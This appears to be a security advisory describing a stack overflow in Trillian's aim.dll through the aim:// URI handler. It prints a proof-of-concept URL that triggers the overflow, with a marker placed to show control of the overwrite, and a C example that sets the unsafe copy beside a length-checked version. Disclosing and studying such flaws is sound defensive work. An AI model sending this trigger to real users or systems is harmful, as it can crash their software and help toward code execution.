Stack Overflow in Trillian's aim.dll through the aim:// URI
The Trillian application is a tool that allows users to chat across multiple protocols, such as AIM, IRC, ICQ, Yahoo!, and MSN.
When Trillian is installed, the aim:// URI is registered in the Windows registry and associated with the command
'Rundll32.exe "C:/program files/Trillian/plugins/aim.dll", aim_util_urlhandler url="%1" ini="C:/program files/Trillian/users/default/Cache/pending_aim.ini"'.
As you can see, calling the aim:// protocol spawns a rundll32.exe process, which loads aim.dll with the specified options. The value passed to aim_util_urlhandler as url is controlled by the user through the URI, such as aim://myurl. This value is later copied without bounds checking, and an attacker can use this to cause a stack overflow exception. Accessing the following URL from IE6, IE7, or Firefox will trigger a stack overflow:
aim:///#1111111/1111111111111111111111111111111111111111111111111111111111111
2222222222222222222222222222222222222222222222222222222222222
3333333333333333333333333333333333333333333333333333333333333
4444444444444444444444444444444444444444444444444444444444444
5555555555555555555555555555555555555555555555555555555555555
6666666aaaabbbb66666666666666666666666666666666666666666666
6666666666666667777777777777777777777777777777777777777777777777777777777777
8888888888888888888888888888888888888888888888888888888888888
9999999999999999999999999999999999999999999999999999999999999
0000000000000000000000000000000000000000000000000000000000000
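
The unbounded copy described above, next to a length-checked alternative, as an added C example that is not Trillian's code. The function names, the `URL_MAX` limit and the sample argument string are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define URL_MAX 256  /* assumed limit for this example; not Trillian's real buffer size */

/* Unsafe pattern of the kind the advisory describes: the url value is
 * copied into a fixed stack buffer with no length check. Shown for
 * contrast only; never called in this example. */
int handle_url_unchecked(const char *url)
{
    char buf[URL_MAX];
    strcpy(buf, url);               /* overflows buf when strlen(url) >= URL_MAX */
    return (int)strlen(buf);
}

/* Hardened form: locate url="..." in the handler's argument string and
 * copy it only if it fits. Returns the length on success, -1 if the
 * argument is missing or unterminated, -2 if it is too long. */
int extract_url_checked(const char *args, char *out, size_t outsz)
{
    static const char key[] = "url=\"";
    const char *start, *end;
    size_t len;

    if (args == NULL || out == NULL || outsz == 0)
        return -1;
    start = strstr(args, key);
    if (start == NULL)
        return -1;
    start += sizeof(key) - 1;
    end = strchr(start, '"');
    if (end == NULL)
        return -1;
    len = (size_t)(end - start);
    if (len >= outsz)               /* reject instead of truncating or overflowing */
        return -2;
    memcpy(out, start, len);
    out[len] = '\0';
    return (int)len;
}

int main(void)
{
    char url[URL_MAX];
    /* Constructed sample argument string in the shape of the registered command. */
    const char *args = "url=\"aim://myurl\" ini=\"pending_aim.ini\"";
    int rc = extract_url_checked(args, url, sizeof url);
    printf("rc=%d url=%s\n", rc, rc >= 0 ? url : "(rejected)");
    return 0;
}
```

Rejecting an over-long value outright, rather than truncating it, keeps the handler from acting on a URI it only partly parsed.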